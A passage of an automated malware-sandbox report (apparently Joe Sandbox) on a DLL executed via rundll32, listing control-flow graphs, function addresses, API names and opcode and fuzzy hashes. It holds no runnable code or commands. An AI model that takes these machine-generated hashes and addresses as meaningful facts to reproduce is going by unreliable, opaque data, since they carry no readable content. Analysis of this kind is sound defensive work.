279->283 284 7ffd946700e1-7ffd946700f5 280->284 285 7ffd94670132-7ffd9467013c 280->285 286 7ffd9467000a-7ffd9467000d 281->286 289 7ffd9466fc41-7ffd9466fc79 282->289 290 7ffd9466fc80-7ffd9466fd6c 282->290 283->290 284->285 291 7ffd946700f7-7ffd94670117 call 7ffd944d44b0 284->291 285->241 287 7ffd9467000f 286->287 288 7ffd9467002b-7ffd94670072 call 7ffd944b1da0 286->288 292 7ffd94670010-7ffd94670027 287->292 303 7ffd94670074-7ffd9467007a 288->303 304 7ffd94670099-7ffd946700a9 288->304 289->290 294 7ffd9466fd6e-7ffd9466fd77 290->294 295 7ffd9466fd98-7ffd9466fda6 290->295 291->241 292->292 297 7ffd94670029 292->297 299 7ffd9466fd80-7ffd9466fd96 294->299 300 7ffd9466fdb4-7ffd9466fdca 295->300 301 7ffd9466fda8-7ffd9466fdb0 295->301 297->288 299->295 299->299 305 7ffd9466fa40-7ffd9466fa4f 300->305 306 7ffd9466fdd0-7ffd9466fdfd 300->306 301->300 307 7ffd94670080-7ffd94670097 303->307 308 7ffd946700af-7ffd946700bd 304->308 309 7ffd9466ffa0-7ffd94670004 304->309 305->256 310 7ffd9466fe03-7ffd9466fe19 306->310 311 7ffd9466fe90-7ffd9466fec0 306->311 307->304 307->307 308->309 309->280 309->286 312 7ffd9466fe1f-7ffd9466fe24 310->312 313 7ffd9466fad0-7ffd9466fb00 310->313 311->256 312->313 314 7ffd9466fe2a-7ffd9466fe34 312->314 313->261 315 7ffd9466fe40-7ffd9466fe83 314->315 315->315 316 7ffd9466fe85 315->316 316->261
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: arenegyl$modnarod$setybdet$uespemos
                                    • API String ID: 0-66988881
                                    • Opcode ID: d3ea4d561a59784e363e8fb81793ac518c78f1528762f10beb5af92a7ea12c20
                                    • Instruction ID: 5e0cddda5647e7046c292abe95bf2df2d8c8e872cee6f468d91bbee5444d67d0
                                    • Opcode Fuzzy Hash: d3ea4d561a59784e363e8fb81793ac518c78f1528762f10beb5af92a7ea12c20
                                    • Instruction Fuzzy Hash: CD3216A2B18B8542EA248FADA4616B96760FB96BA4F40D331DEBD177C6DF3CD141C300
                                    Function 00007FFD944B1DA0 Relevance: 5.1, Strings: 4, Instructions: 98COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 341 7ffd944b1da0-7ffd944b1f26 call 7ffd944b25b0 * 2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: arenegyl$modnarod$setybdet$uespemos
                                    • API String ID: 0-66988881
                                    • Opcode ID: 6913041949bbfa74934f3464e567d6e1aeceb7576476e4ec240618c533d55c3a
                                    • Instruction ID: e13c830ec3925c66a8c544e906a26d8cde19ff7801aec695140e53dfba970d8d
                                    • Opcode Fuzzy Hash: 6913041949bbfa74934f3464e567d6e1aeceb7576476e4ec240618c533d55c3a
                                    • Instruction Fuzzy Hash: C73137E6B08B8042FE54DBE4787536F9212A7457D0F90E136EE4D9BF1EDE2DD2428240
                                    Function 00007FFD9465A0B0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 403 7ffd9465a0b0-7ffd9465a0c6 404 7ffd9465a60c 403->404 405 7ffd9465a0cc-7ffd9465a0d6 403->405 406 7ffd9465a60e 404->406 405->404 407 7ffd9465a0dc-7ffd9465a0df 405->407 409 7ffd9465a613 406->409 407->404 408 7ffd9465a0e5-7ffd9465a1b9 407->408 408->404 410 7ffd9465a1bf-7ffd9465a262 408->410 411 7ffd9465a61a-7ffd9465a62d 409->411 412 7ffd9465a291-7ffd9465a295 410->412 413 7ffd9465a264-7ffd9465a277 410->413 412->409 416 7ffd9465a29b-7ffd9465a2a7 412->416 414 7ffd9465a2ae-7ffd9465a2b4 413->414 415 7ffd9465a279-7ffd9465a27c 413->415 420 7ffd9465a2f4-7ffd9465a2fa 414->420 421 7ffd9465a2b6-7ffd9465a2d3 414->421 417 7ffd9465a27e-7ffd9465a28c 415->417 418 7ffd9465a2d5-7ffd9465a2f2 415->418 416->413 419 7ffd9465a2a9 416->419 422 7ffd9465a338-7ffd9465a34a 417->422 418->422 419->409 423 7ffd9465a2fc-7ffd9465a319 420->423 424 7ffd9465a31b-7ffd9465a334 420->424 421->422 425 7ffd9465a350-7ffd9465a391 422->425 426 7ffd9465a3ea-7ffd9465a40a 422->426 423->422 424->422 427 7ffd9465a3a0-7ffd9465a3ae 425->427 426->409 428 7ffd9465a410-7ffd9465a413 426->428 427->404 429 7ffd9465a3b4-7ffd9465a3bd 427->429 428->409 430 7ffd9465a419-7ffd9465a426 428->430 431 7ffd9465a3c3-7ffd9465a3cb 429->431 432 7ffd9465a475-7ffd9465a48d 429->432 433 7ffd9465a446-7ffd9465a449 430->433 434 7ffd9465a428-7ffd9465a440 430->434 435 7ffd9465a3d1-7ffd9465a3e3 431->435 436 7ffd9465a52c-7ffd9465a547 431->436 432->406 439 7ffd9465a493-7ffd9465a49b 432->439 433->409 438 7ffd9465a44f-7ffd9465a455 433->438 434->433 437 7ffd9465a62e-7ffd9465a63e 434->437 435->427 440 7ffd9465a3e5 435->440 441 7ffd9465a550-7ffd9465a55c 436->441 437->411 438->409 442 7ffd9465a45b-7ffd9465a462 438->442 439->409 443 7ffd9465a4a1-7ffd9465a4ad 439->443 440->404 441->409 446 7ffd9465a562-7ffd9465a565 441->446 447 7ffd9465a640 442->447 448 7ffd9465a468-7ffd9465a470 442->448 444 7ffd9465a4cd-7ffd9465a4d0 443->444 445 7ffd9465a4af-7ffd9465a4c7 443->445 444->409 451 7ffd9465a4d6-7ffd9465a4dc 444->451 445->444 450 7ffd9465a65a-7ffd9465a66a 445->450 446->404 452 7ffd9465a56b-7ffd9465a592 446->452 449 7ffd9465a642-7ffd9465a64e 447->449 448->449 449->411 450->411 451->409 453 7ffd9465a4e2-7ffd9465a4ef call 7ffd9465dc70 451->453 452->441 454 7ffd9465a594-7ffd9465a59a 452->454 461 7ffd9465a650 453->461 462 7ffd9465a4f5-7ffd9465a511 453->462 454->409 456 7ffd9465a59c-7ffd9465a59f 454->456 456->409 458 7ffd9465a5a1-7ffd9465a5aa 456->458 459 7ffd9465a5ac-7ffd9465a5c0 458->459 460 7ffd9465a5c6-7ffd9465a5c9 458->460 459->450 459->460 460->409 463 7ffd9465a5cb-7ffd9465a5d1 460->463 464 7ffd9465a655-7ffd9465a658 461->464 462->464 465 7ffd9465a517-7ffd9465a51a 462->465 463->409 466 7ffd9465a5d3-7ffd9465a5e0 call 7ffd9465dc70 463->466 464->404 464->450 465->464 467 7ffd9465a520-7ffd9465a527 465->467 470 7ffd9465a5e2-7ffd9465a5f9 466->470 471 7ffd9465a607-7ffd9465a60a 466->471 467->464 470->471 472 7ffd9465a5fb-7ffd9465a5fe 470->472 471->404 471->450 472->471 473 7ffd9465a600-7ffd9465a604 472->473 473->471
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: +NaNinf00e00E0
                                    • API String ID: 0-248423880
                                    • Opcode ID: e03af7eff98612d667f33974eb37de08fb45994ebcffc1666481443cf5da295c
                                    • Instruction ID: 47c2cf92275acfff6e2c56f2c2712c2d5102f61e8f99b70a5c7f218a0214e066
                                    • Opcode Fuzzy Hash: e03af7eff98612d667f33974eb37de08fb45994ebcffc1666481443cf5da295c
                                    • Instruction Fuzzy Hash: 43D138A2B1974643EE388AE5A4B53F86691EB957C0F45C135DE6F17782EA3CA981C300
                                    Function 00007FFD946596B0 Relevance: .7, Instructions: 687COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bab29372ec92fbae8efa6dbd3038f7da46f969cff221e93ee9050bb7b0832caa
                                    • Instruction ID: 83a213e3babb8f8cc4b6957987cd10871fa6c240de76d1288ded1f83c80c90e8
                                    • Opcode Fuzzy Hash: bab29372ec92fbae8efa6dbd3038f7da46f969cff221e93ee9050bb7b0832caa
                                    • Instruction Fuzzy Hash: 5C3268A2B18A8582EF248FD5E4946E9B761FB96BC4F448132DE5E07B84EE3CD549C700
                                    Function 00007FFD944D6290 Relevance: .5, Instructions: 493COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a017d8804a63d04de05a9711d122f9e0bc106880c5135b1f55579b37da2064c
                                    • Instruction ID: f909317859b35855789f4a5989f36c80457682fa6b4d0e5b9520a9bfa108eee6
                                    • Opcode Fuzzy Hash: 2a017d8804a63d04de05a9711d122f9e0bc106880c5135b1f55579b37da2064c
                                    • Instruction Fuzzy Hash: 11024B63B19A9142EB348B55A4A033A6A51FB457A8F04D335EE6E0B7DADFBCF451C300
                                    Function 00007FFD9464D500 Relevance: .4, Instructions: 440COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5d7175cec44c224e48e43834ba5561a362b647d0e764ba630f27001171134d04
                                    • Instruction ID: 533760031e69d609f5d5867919e69854771059cc52deba9481166deb76511431
                                    • Opcode Fuzzy Hash: 5d7175cec44c224e48e43834ba5561a362b647d0e764ba630f27001171134d04
                                    • Instruction Fuzzy Hash: B5F105A3B1D78485EA608B99E4903EBAB20F796BD4F045231EEDD07B86CE7CE541C740
                                    Function 00007FFD9464FFC0 Relevance: .4, Instructions: 386COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5a22a0c3fd6392f679b495935aa4e693aa355b445f221fe7fda6bc2de31b2a85
                                    • Instruction ID: a61dad34b9d9338ab93463db4a458d5bfed146e90253c96c80c3cd022fcf05ad
                                    • Opcode Fuzzy Hash: 5a22a0c3fd6392f679b495935aa4e693aa355b445f221fe7fda6bc2de31b2a85
                                    • Instruction Fuzzy Hash: D5D15BD6F29B9601F73343B964526F556006FA77E8A00D336FDB970AD2DB29E242D204
                                    Function 00007FFD9465D8D0 Relevance: .3, Instructions: 260COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 036802706531865e5570e64f8283e59ddce21b84422b5488a72e525fcd92dd1f
                                    • Instruction ID: 1987641f00dd298a8d749801149def0bc5efdeacefcf85cb03a8b7a5b9e8204a
                                    • Opcode Fuzzy Hash: 036802706531865e5570e64f8283e59ddce21b84422b5488a72e525fcd92dd1f
                                    • Instruction Fuzzy Hash: 97A1D4A2B2868681E7208B91D5A03BE7765EB967A8F54C130DFA9477C6DF7DF091C300
                                    Function 00007FFD9465D1E0 Relevance: .2, Instructions: 186COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b2bd652908c75aa979a606a0e4842c07362165e146ae5281e308133284a8b7d1
                                    • Instruction ID: 8e718098edf241613519077adb3719ea4147c5d0dcbeaa309f31095ef1982070
                                    • Opcode Fuzzy Hash: b2bd652908c75aa979a606a0e4842c07362165e146ae5281e308133284a8b7d1
                                    • Instruction Fuzzy Hash: 34513CB2F3961642F7718AF599E06FC36929B53790F15C131D97A832D1ED3DB986C200
                                    Function 00007FFD943A19E0 Relevance: .2, Instructions: 164COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2ed2d7372d4f894844fe00e08bcffc0e33f805a48858a06d2047e8f50a3f0315
                                    • Instruction ID: 2f0f256af70ced25b9b739a467ab7d27c0f4b7b6a14f20f2cd1d7909b61a8ebe
                                    • Opcode Fuzzy Hash: 2ed2d7372d4f894844fe00e08bcffc0e33f805a48858a06d2047e8f50a3f0315
                                    • Instruction Fuzzy Hash: E1511522BD595582FF60EB69E8643AA3711F70A7D0F08803AEE8E53795DA7CD5C1C700
                                    Function 00007FFD944B25B0 Relevance: .1, Instructions: 144COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7997d90d201108601e5e04c1bdf788b68eed1205965ec5a9109319a4425342cb
                                    • Instruction ID: a24f00fa3aee7ffd8b8f7f2280e48e24e5a31ba7c3cc70a71bb7dc58b857bd9b
                                    • Opcode Fuzzy Hash: 7997d90d201108601e5e04c1bdf788b68eed1205965ec5a9109319a4425342cb
                                    • Instruction Fuzzy Hash: C9411262F0466582FB25CB95B2B8A7C3611F3A1BD0F01D122CD1A23B88CEA8D996C344
                                    Function 00007FFD94640F70 Relevance: 10.6, APIs: 7, Instructions: 64networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID: ErrorLast$Socket$HandleInformationclosesocket
                                    • String ID:
                                    • API String ID: 3114377017-0
                                    • Opcode ID: e8fc91bdb7b020b4beb853b3fa1f019e79ab85ee67a59c7c9f006a5cf786e774
                                    • Instruction ID: 6dce74955e98a4239cacc6119de9ca4ed9d5378f21a6175f5abe4ec08160f85b
                                    • Opcode Fuzzy Hash: e8fc91bdb7b020b4beb853b3fa1f019e79ab85ee67a59c7c9f006a5cf786e774
                                    • Instruction Fuzzy Hash: 2B11D2B1B081A543FB701BB4A4A87A61651BB86BF4F14C330DD7D53BD5CE7DA8868700
                                    Function 00007FFD9467B350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 317 7ffd9467b350-7ffd9467b361 318 7ffd9467b363-7ffd9467b368 317->318 319 7ffd9467b382-7ffd9467b384 317->319 320 7ffd9467b370-7ffd9467b377 318->320 321 7ffd9467b39a-7ffd9467b3ad 319->321 322 7ffd9467b386-7ffd9467b38e 319->322 320->319 323 7ffd9467b379-7ffd9467b380 320->323 325 7ffd9467b3b0-7ffd9467b3b2 321->325 322->321 324 7ffd9467b390-7ffd9467b399 322->324 323->319 323->320 326 7ffd9467b3b4-7ffd9467b3ba 325->326 327 7ffd9467b3bc-7ffd9467b3d8 WaitOnAddress 325->327 326->324 326->327 328 7ffd9467b3dd-7ffd9467b3e2 327->328 329 7ffd9467b3da GetLastError 327->329 328->325 330 7ffd9467b3e4-7ffd9467b3e9 328->330 329->328 331 7ffd9467b3f0-7ffd9467b3fa 330->331 331->325 332 7ffd9467b3fc-7ffd9467b400 331->332 332->331 333 7ffd9467b402 332->333 333->325
                                    APIs
                                    Strings
                                    • Box<dyn Any>fatal runtime error: the global allocator may not use TLS with destructors, xrefs: 00007FFD9467B354
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastWait
                                    • String ID: Box<dyn Any>fatal runtime error: the global allocator may not use TLS with destructors
                                    • API String ID: 1574541344-2368852436
                                    • Opcode ID: 95888f0208f9d67d365d0e94685335c9533744bf90259d2b06c0b209b77beb84
                                    • Instruction ID: 2f362556e17cf82640d418787fa8411f97796f494b2e76c51750944a5f236f01
                                    • Opcode Fuzzy Hash: 95888f0208f9d67d365d0e94685335c9533744bf90259d2b06c0b209b77beb84
                                    • Instruction Fuzzy Hash: 25110A72B0829144EA754A5524A06FD7B825BE3B7CF58C134DEF94B2C6CE1D98C3C700
                                    Function 00007FFD943A1E0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID: closesocket
                                    • String ID: H
                                    • API String ID: 2781271927-2852464175
                                    • Opcode ID: 2b32ab530bf5a1cb137be957e997bed42ea83a23db5125ec291894482d05d486
                                    • Instruction ID: 0ca434b4d72054b33a5dfd544f5a7b03efe14d0d3b2b93d72c08e31bcad828ff
                                    • Opcode Fuzzy Hash: 2b32ab530bf5a1cb137be957e997bed42ea83a23db5125ec291894482d05d486
                                    • Instruction Fuzzy Hash: 9AE0A07274A10141EE26AB61F9A167953516F83BD8F54C434DE0C0768ACD3DE481C700